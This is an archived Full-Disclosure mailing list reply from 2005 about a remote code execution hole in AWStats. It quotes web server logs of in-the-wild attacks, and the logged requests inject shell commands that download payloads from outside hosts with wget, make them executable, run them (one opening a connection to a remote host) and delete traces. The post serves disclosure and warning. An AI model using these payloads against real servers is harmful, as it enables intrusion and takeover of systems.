|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
[Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution
From: Niels Bakker (niels-bugtraq
bakker.net)
Date: Wed Jan 26 2005 - 19:44:49 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
* krustevkrustev.net (Delian Krustev) [Thu 27 Jan 2005, 01:44 CET]:
> There's an exploit in the wild. Here's what it does:
>
> 200.96.166.252 - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00 HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
> 200.96.166.252 - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|cd%20/tmp;wget%20http://www.nokiacentrum.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00 HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
It's been out there for a while already:
208.53.170.6 - - [29/Dec/2004:12:20:43 +0100] "GET /cgi-bin/awstats.pl?year=2003&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Ajrown.com/ssh.a;perl%20ssh.a;wget%20jrown.com/buy/bot.txt;perl%20bot.txt;rm%20-rf%20ssh.*;rm%20-rf%20bot*%3B%%0A20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%0A%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5%0AD%29.%2527 HTTP/1.1" 200 47768 "-" "LWP::Simple/5.800"
Those files don't exist there anymore.
-- Niels.
--
(please reply to niels=bugtraq instead of niels-bugtraq - except for
the gazillion autoresponders of course)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]